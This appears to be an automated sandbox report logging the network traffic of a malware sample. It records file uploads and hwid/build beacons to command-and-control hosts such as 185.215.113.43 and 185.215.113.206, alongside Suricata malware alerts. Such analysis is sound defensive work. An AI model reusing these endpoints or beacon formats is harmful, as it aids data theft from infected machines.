Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: /Content-Length: 27816Content-Type: multipart/form-data; boundary=------------------------5l7G3aZgFTH0NKkrout6lXData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 6c 37 47 33 61 5a 67 46 54 48 30 4e 4b 6b 72 6f 75 74 36 6c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 7a 69 68 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 47 84 7a 93 ce 42 d1 33 23 61 8f f7 6b b5 9d 25 00 59 ef 2d ee 8c a7 2e c4 ce a3 67 fa 59 6a 64 aa 8b 04 11 77 48 a8 06 44 ba 2c 7d 63 0c 3b e3 fc 02 ab 3c af 0f 87 b1 cc b6 00 b6 d2 48 8b 28 77 9b 49 78 b7 11 4c ab ab 7f c9 fa ba e6 9d 1c c2 1f cd 29 af 1f f9 7d 2e 30 89 8f e4 af e7 fa 86 46 14 39 a7 30 8b 24 c6 fe 01 a0 b8 68 51 12 89 d9 b6 e5 9f 27 c0 78 1f a7 f0 c3 93 d7 63 35 4a 87 1f ea 47 49 84 0a cd 07 32 41 6f 7d a7 8c ea f1 df b7 d2 77 7e fb fc e2 8b 5a c9 0b f0 5b 3b d7 d0 7f 6f b3 a0 a9 0d cc 42 99 01 07 40 31 b1 0c 90 e2 47 5d dc 9b 04 47 bc 9f 0d 2e d1 bc 6f 66 67 43 14 1f cf 0c c1 ef bd 7f 08 43 ee c5 39 f2 e5 0d ef fa f3 20 93 87 0c 58 b5 b6 45 ec c1 5c ce a3 c2 5b 49 42 d0 f5 e0 dd d3 6d 09 6b dc 92 e1 d1 6e 56 c9 a9 93 fd 9a cb 05 b4 1b 5a 6a ef a3 98 a9 3c 18 09 01 f8 cd 25 7b fa 14 e7 cd c2 e9 1a 11 63 c5 61 9a d2 47 64 cc 1c 93 de 13 a5 01 5f e1 d0 6d 43 5a 8c 78 56 83 fa ea ff 48 1b 05 73 45 55 ab 72 4e e8 d6 08 31 0b c7 9c 69 fd c3 69 cf 26 4b ad 2a f4 bb de 9c c8 75 93 26 dc 3f 86 f7 eb 8b b1 9d 99 95 dc c4 3d e6 d3 0f 4e 17 f4 77 08 6a d9 0f 4d 60 de 84 3e 6c 19 e1 a6 bc 0b 5d 25 00 59 18 33 2a a2 38 71 e5 50 7d 06 6f e3 8d 1d e7 ca 42 95 b9 47 29 8a e0 26 23 8d 5f e7 9c 93 ac ee b4 cd 0e 54 d8 93 98 92 eb cc 3d 49 fa 0c 78 96 22 80 4e fa fe a4 e4 95 66 b1 ae ae bf 90 83 54 d4 08 d3 00 14 90 cd a1 63 ce c0 12 fc 7d 1d ae 53 9b 02 81 3a 26 af e7 0c 6e 63 0c 5c 9d 68 87 a4 a1 bf db 62 b8 0e d6 86 80 3e 41 02 4a 8b d7 cf c0 2b 57 68 f3 13 0a fe 45 38 ed c6 b6 45 bd 48 c5 e8 e3 ed f0 8e 49 42 db aa e1 ae 39 92 7d f0 e6 04 43 dc a7 0d eb 9f c7 80 a5 0d 69 a9 b2 00 ef e0 1e 00 18 ad 82 5b d3 ca 17 e1 0e 1e 58 4b 8d e3 82 3a 6c 71 ba 57 5e 7d f0 d1 37 b5 b8 06 2b 65 82 60 79 f2 7d 02 fd 99 df 11 2c 8e 6a 2f 11 b0 c1 03 60 da df 66 83 76 9d 6a 39 28 6a ba cc 35 04 7f 83 77 af e9 e8 8b d5 87 fa cc 17 a8 27 c3 45 3c ea 78 e3 7e 52 21 e4 b5 9f 43 01 01 23 1a f8 85 80 c9 79 40 f1 f4 13 4c 28 02 af 2b 72 20 8a 9e ea 1d 9a 52 3c 20 5b 14 4d bb 18 d8 f7 d1 47 55 ce 89 e0 f3 e0 71 24 09 0c 34 3d f1 f9 bc 4a 8d bf 54 61 3d 34 66 10 e9 77 38 4a 67 12 7a 28 b9 09 40 d1 0e 47 5b 4e 97 77 bb cc 47 e6 d8 d8 2f 9d 27 40 f8 d0 dd 21 dd cd c4 64 85 99 ac 05 79 76 e7 61 1f ab c9 4a 33 04 62 e2 ae 62 f0 0b 90 d2 ff 2c 3b b0 df 9a bf 43 fb f3 66 bc e2 ba c6 79 9d 29 39 9d 53 d9 7e 53 4e
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJKEHCAKFBFHJKEHCFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 2d 2d 0d 0a Data Ascii: ------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="build"mars------JJJJKEHCAKFBFHJKEHCF--

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49750 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49759 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49794 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49823 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49845 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49846 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49858 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49871 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49872 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49878 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49884 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49893 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49902 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49912 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49921 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49928 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49939 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49941 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49998 -> 172.67.162.84:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50008 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49983 -> 172.67.162.84:443

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C56CC60 PR_Recv,

0_2_6C56CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zeVK4sAsYaA8nSs&MD=rnFVSrPb HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zeVK4sAsYaA8nSs&MD=rnFVSrPb HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
